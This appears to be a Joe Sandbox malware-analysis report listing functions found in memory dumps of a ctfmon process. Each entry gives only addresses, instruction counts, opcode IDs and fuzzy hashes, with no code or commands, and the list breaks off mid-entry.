                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 1423db0c59d11c79dfa29496acc0754d4e0a771df7150a221dc4b3a415067bdd
                                                                                                                  • Instruction ID: 69a3b19b2e9cf87715256193df98c1f8a5ddd690601956b48bb3d438876de627
                                                                                                                  • Opcode Fuzzy Hash: 1423db0c59d11c79dfa29496acc0754d4e0a771df7150a221dc4b3a415067bdd
                                                                                                                  • Instruction Fuzzy Hash: C3F0A02164E3C04FCB169A348868445BFA0AF6721074901EEC046CF1A3DA1C8C86C701
                                                                                                                  Function 00007FFD348CEC09 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 816dc3a271245afeed0b6ccf39fd7f701cd2b6b92182504b07a3b4c8876d3ef3
                                                                                                                  • Instruction ID: 192058bb7524708705598f44818d54293998ca4faaa3e678c43ec6bf1dad48c1
                                                                                                                  • Opcode Fuzzy Hash: 816dc3a271245afeed0b6ccf39fd7f701cd2b6b92182504b07a3b4c8876d3ef3
                                                                                                                  • Instruction Fuzzy Hash: 08F0307154E7C04FCB16963488654557FA1AE6721174A51EEC146CB1A7DA1DC889C701
                                                                                                                  Function 00007FFD348C94B9 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: eed2c0aacbb2abafea2beffa3741e09b1e6aae4da2cafe4220cd024a67b72d77
                                                                                                                  • Instruction ID: 84bb4e0135656365c1d4f8293630e7c1256054e98799f2797e45484e70314e3a
                                                                                                                  • Opcode Fuzzy Hash: eed2c0aacbb2abafea2beffa3741e09b1e6aae4da2cafe4220cd024a67b72d77
                                                                                                                  • Instruction Fuzzy Hash: 0CE0126154E3C44FCB55EB3484A58557FA0EE6721074A40DEC145CB1B3E61D8846C701
                                                                                                                  Function 00007FFD348C9309 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: 5d20202096d7ab81db41d2fc1751f0ae7a7a000a443881c99d743556cade1d86
                                                                                                                  • Instruction ID: 352cb8626d08434f0fce90f601030a3564e3fe0e1065f4a3c9644e5d9d196d50
                                                                                                                  • Opcode Fuzzy Hash: 5d20202096d7ab81db41d2fc1751f0ae7a7a000a443881c99d743556cade1d86
                                                                                                                  • Instruction Fuzzy Hash: 3DE01A7154E7C04FCB46EB3488698447FA0EE6721078B40EEC185CF1B3E62D9849C701
                                                                                                                  Function 00007FFD348D2459 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: d0be42708e06f52e1407ed93498b8c75669ddb30a83b86d5df0c6012fb798222
                                                                                                                  • Instruction ID: fb025db360e8eae15b3d2ca1db471f5d09605d976d370ed48754478aa81bdb47
                                                                                                                  • Opcode Fuzzy Hash: d0be42708e06f52e1407ed93498b8c75669ddb30a83b86d5df0c6012fb798222
                                                                                                                  • Instruction Fuzzy Hash: F4E01A7054E3C08FCB06EF3488A98443F60EE6B21078A41EEC145CF1B3D62E884AC711
                                                                                                                  Function 00007FFD348C9533 Relevance: .2, Instructions: 219COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d0b7662297f0900630a920a80ad9e2fb7a8b67ff7f0418bae0b3715be0d5d3a5
                                                                                                                  • Instruction ID: 5d882d2035fb5ea78eefddbb182c1cf6afd1271e83f4ef5b386a2a6d8b6c5de4
                                                                                                                  • Opcode Fuzzy Hash: d0b7662297f0900630a920a80ad9e2fb7a8b67ff7f0418bae0b3715be0d5d3a5
                                                                                                                  • Instruction Fuzzy Hash: F9717031B589098FEB59EF58C4B1AA973E2FF99310F5445B9D10EC3296DE38AC42DB40
                                                                                                                  Function 00007FFD348A090D Relevance: .2, Instructions: 154COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c9fead62fbff04aae6051436b4010e89d8116736f0c913848096f313c98bcbed
                                                                                                                  • Instruction ID: 32df9c26d53aca2f9bbea4c4212feca2fa8b92b79448768182c753758096fa08
                                                                                                                  • Opcode Fuzzy Hash: c9fead62fbff04aae6051436b4010e89d8116736f0c913848096f313c98bcbed
                                                                                                                  • Instruction Fuzzy Hash: 51412312B0CA950FE754B7FCA0BA6F97BD5DF4A321B1804BFD14EC7193DD68A8818284
                                                                                                                  Function 00007FFD348C95EC Relevance: .2, Instructions: 152COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 69005592b2daf5f0d670dcc8d2069b0001cbb6b278352e61b689e1ac07ca2e8d
                                                                                                                  • Instruction ID: 2817fdd8e6c78e5bdb81d4828eb1511b7862d0566be1bad38504b4def74a7921
                                                                                                                  • Opcode Fuzzy Hash: 69005592b2daf5f0d670dcc8d2069b0001cbb6b278352e61b689e1ac07ca2e8d
                                                                                                                  • Instruction Fuzzy Hash: 87417531B1890D8FDB54EF5CC4A4AA9B7E5FB99310F5006BAD11EC76D1DB38A892CB40
                                                                                                                  Function 00007FFD348A08E8 Relevance: .1, Instructions: 134COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: be3f9b859b6b5279cf48f113a3d6a3359f998b97335d6581c50b5941a8af4771
                                                                                                                  • Instruction ID: 2756a9ae8e137beeb34ae0ed6eba25ccbfdc7a0368ce5ee4e04221488609f2fd
                                                                                                                  • Opcode Fuzzy Hash: be3f9b859b6b5279cf48f113a3d6a3359f998b97335d6581c50b5941a8af4771
                                                                                                                  • Instruction Fuzzy Hash: C131253170D9184FE768EB5CE89A9B977D0EF4A32030505BBE58AC7166E961EC8287C1
                                                                                                                  Function 00007FFD348A0960 Relevance: .1, Instructions: 117COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c32eb2ec8c095732da16475fc417dfcda330143d105b22b0fea4ba7622e48028
                                                                                                                  • Instruction ID: f0f6e48b4d93aadd22aa2b728f593e97f4457667b7b522d059bab677427568af
                                                                                                                  • Opcode Fuzzy Hash: c32eb2ec8c095732da16475fc417dfcda330143d105b22b0fea4ba7622e48028
                                                                                                                  • Instruction Fuzzy Hash: 9E31F311B1C9591FEBA8B7AC60B66F923C5DF8A321B18447AE50DC32D3DD68AC814294
                                                                                                                  Function 00007FFD348D2A91 Relevance: .1, Instructions: 107COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 38fc65bebe41170bb1d76fbf15e70ac328d1dcbaef7358321d82935ba8ab87a8
                                                                                                                  • Instruction ID: 2895ad55a33809d69352dea5677bfef80a9bfa30bf08ebc9f8397beac4e72f59
                                                                                                                  • Opcode Fuzzy Hash: 38fc65bebe41170bb1d76fbf15e70ac328d1dcbaef7358321d82935ba8ab87a8
                                                                                                                  • Instruction Fuzzy Hash: 50312632A0EA4A8FEB65DB18C8A57E537D1EB96320F0403BBD449D72C2CD686C458781
                                                                                                                  Function 00007FFD348A0998 Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1f1260933e2797dbe229d6b75dfcef3444d1bc847fba05d85c6c9652be998db6
                                                                                                                  • Instruction ID: 9500b27928d0e5ca6b293f544700c14936362eb6be3aca27e38520a967a4ddad
                                                                                                                  • Opcode Fuzzy Hash: 1f1260933e2797dbe229d6b75dfcef3444d1bc847fba05d85c6c9652be998db6
                                                                                                                  • Instruction Fuzzy Hash: C2212C11B199590FEBD8FB6C94B96B973C6DB8A311F14007DE50DC32D3DD68AC414290
                                                                                                                  Function 00007FFD348D2124 Relevance: .1, Instructions: 79COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e52dd468bcf9643168984e8ae325ec3fd941048f7d441a2910458734133b4412
                                                                                                                  • Instruction ID: c4720e6b7e493e004df555ba56fe14dd332e7e08eb54ad0b9a04d0656f92752d
                                                                                                                  • Opcode Fuzzy Hash: e52dd468bcf9643168984e8ae325ec3fd941048f7d441a2910458734133b4412
                                                                                                                  • Instruction Fuzzy Hash: 1B21C631B1D6514BEB18AB5C946537977C1FB9E708F00437DE58ED32C2DE6C68029286
                                                                                                                  Function 00007FFD348A0C25 Relevance: .1, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6f08a110cfc4ee5a7af6998259fd7e089a6fbac2ffb5faa3399d85ccb4f5ecd0
                                                                                                                  • Instruction ID: 1e7090767c503a11af82f3c1a007e0902591b347f2507420222b2a957f122cc1
                                                                                                                  • Opcode Fuzzy Hash: 6f08a110cfc4ee5a7af6998259fd7e089a6fbac2ffb5faa3399d85ccb4f5ecd0
                                                                                                                  • Instruction Fuzzy Hash: 5521F336A0E6898FE712DB7898A12DD7FA0EF43320F1445B7C244CB182D538260A9791
                                                                                                                  Function 00007FFD348A0C38 Relevance: .1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ae443ae44a474706d0cfc49d7ba00d0630a9aa20d7c5437acbd0ecc0e8f381d5
                                                                                                                  • Instruction ID: c1e908997704df5f15163db322e9dbfd8ac0f324fb27565aba424c69625a0828
                                                                                                                  • Opcode Fuzzy Hash: ae443ae44a474706d0cfc49d7ba00d0630a9aa20d7c5437acbd0ecc0e8f381d5
                                                                                                                  • Instruction Fuzzy Hash: 0111A035A0E7898FE702DBB888A129D7FB0EF43310F0545B6C284DB193D57856099791
                                                                                                                  Function 00007FFD348A0C40 Relevance: .0, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 08f7dc5fb1e94cf98329d605dbdac5aeffe3e68788f105adc5162c9d925a06db
                                                                                                                  • Instruction ID: b4844c8d26485b55045ab1078c186b4691c30b15c41dc6315e048d3f11d523ac
                                                                                                                  • Opcode Fuzzy Hash: 08f7dc5fb1e94cf98329d605dbdac5aeffe3e68788f105adc5162c9d925a06db
                                                                                                                  • Instruction Fuzzy Hash: E911AD35A0E7888FE702DFB888A029D7FB0EF43310F0545FAC184DB192D67866499791
                                                                                                                  Function 00007FFD348B4126 Relevance: .0, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7c5dec9cc9cdc7d66c1cb5e796ba538ee0ae9ccfe1fb0c5e7a7e83c490b39bb1
                                                                                                                  • Instruction ID: acb9fe47cecd766ccc5857807de389252c2b0a91ae616512346ce043031c5a7a
                                                                                                                  • Opcode Fuzzy Hash: 7c5dec9cc9cdc7d66c1cb5e796ba538ee0ae9ccfe1fb0c5e7a7e83c490b39bb1
                                                                                                                  • Instruction Fuzzy Hash: 8D011771A0850A9FEB68DB84C4B46BEBBB5FF41300F04023AD51AD73D5DEB869869680
                                                                                                                  Function 00007FFD348A0C48 Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ac466752a9c031af13998586b7395b470218c410ba96c7b1c16387b686f38d6f
                                                                                                                  • Instruction ID: be34c56d07ac4c50b98e5d2120c62f92e8ef004e35804d87913651b083c31841
                                                                                                                  • Opcode Fuzzy Hash: ac466752a9c031af13998586b7395b470218c410ba96c7b1c16387b686f38d6f
                                                                                                                  • Instruction Fuzzy Hash: 36019E35A0E3889FD702DFB8C8A029D7FB0AF03310F1945EAC140DB192D67866449791
                                                                                                                  Function 00007FFD348A0C50 Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: da58bd1c288aa3e9e50396c3b9e97b0912a402c90f58a9b77fe241fd52526005
                                                                                                                  • Instruction ID: 5ab5e48dfc1ea3b30e64134cb9c4e9fd42f3fa2c10389fe0d8a8c809058684c5
                                                                                                                  • Opcode Fuzzy Hash: da58bd1c288aa3e9e50396c3b9e97b0912a402c90f58a9b77fe241fd52526005
                                                                                                                  • Instruction Fuzzy Hash: 57018F34E0E3899FE712DBB888A429D7FF0AF03310F1845EAC544DB193DA7856449791
                                                                                                                  Function 00007FFD348CD489 Relevance: .0, Instructions: 32COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6c4b13dfab536f12522356bb7da038eba0a0934bde7395bdcd9dbeecbc1c46ae
                                                                                                                  • Instruction ID: 12154010250eef2b680cc2ecb7ff8106f6a1881bd4973a2d92cd9d7fd396a0ed
                                                                                                                  • Opcode Fuzzy Hash: 6c4b13dfab536f12522356bb7da038eba0a0934bde7395bdcd9dbeecbc1c46ae
                                                                                                                  • Instruction Fuzzy Hash: 81F0306151E7C45FD3129B388D664647FF0EE1720534A05EBC0CACB4B3D51D884BC312
                                                                                                                  Function 00007FFD348D3649 Relevance: .0, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a7469fdc178ad71163c2e5b9232e32e27aeb1d845fcd20c1fca84ab12278e7c9
                                                                                                                  • Instruction ID: 6fb40eddc475ade1bf0cedae355a1e7e7c3e3c1e0e8c8d37c1dadc5649ee4078
                                                                                                                  • Opcode Fuzzy Hash: a7469fdc178ad71163c2e5b9232e32e27aeb1d845fcd20c1fca84ab12278e7c9
                                                                                                                  • Instruction Fuzzy Hash: F7E09230709B884FC70E963888A85507BB1EF6721138902DBC005CB2A3E919DC89C751
                                                                                                                  Function 00007FFD348D48A8 Relevance: .0, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d73e89bbe9b4eeebd5e3323c68ff577932eac7212a46b86862b3407f79ef4f3
                                                                                                                  • Instruction ID: db4b9dbbb1104faf5e545248555ddec97277c140b9de1498f0995eb3c90e4443
                                                                                                                  • Opcode Fuzzy Hash: 6d73e89bbe9b4eeebd5e3323c68ff577932eac7212a46b86862b3407f79ef4f3
                                                                                                                  • Instruction Fuzzy Hash: C8E0DF21B0E9404FD709A77C98B94B836A0EF9721578850BAD009CB1A3E82DEC498742
                                                                                                                  Function 00007FFD348B48C1 Relevance: .0, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b8117e2188a0b56141778081712adbe53c36fc5b39b677d9a053a2a12162f0e6
                                                                                                                  • Instruction ID: 3628555ac0527125ad3a5af77f0d1edf5d8ed4700d4e54cd808a26a0db175cfc
                                                                                                                  • Opcode Fuzzy Hash: b8117e2188a0b56141778081712adbe53c36fc5b39b677d9a053a2a12162f0e6
                                                                                                                  • Instruction Fuzzy Hash: 89F0E530B0C54A4FE609DF0C98E15B933A1EF46710F004175E95AC32D7DE7CA806E6C0
                                                                                                                  Function 00007FFD348B3C30 Relevance: .0, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                  • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                  • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                  • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                  Function 00007FFD348A3FBF Relevance: .0, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction ID: cad59880ea2838d87f4fd587b782959201c0110e635fecbd24ba9d03d9e2b10e
                                                                                                                  • Opcode Fuzzy Hash: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction Fuzzy Hash: A3E01230B094164BF7959B54C4A07B962A1EB8A340F141078DB5DD33D5CF7CAD009755
                                                                                                                  Function 00007FFD348D2470 Relevance: .0, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                  Function 00007FFD348A12E8 Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction ID: 3276c49e548a53cd1e4f0de83272f49a2a4426b800ddd0947254fd997842c080
                                                                                                                  • Opcode Fuzzy Hash: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction Fuzzy Hash: 60C012306118088FCA88EB28C894E1473A0FB1A304B950094E00DCB2A1D66AECC2DB81
                                                                                                                  Function 00007FFD348A0B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction ID: 669f3a9db257c8a8ed837e302ad47010a3f241670bae4078e87893dc875bb850
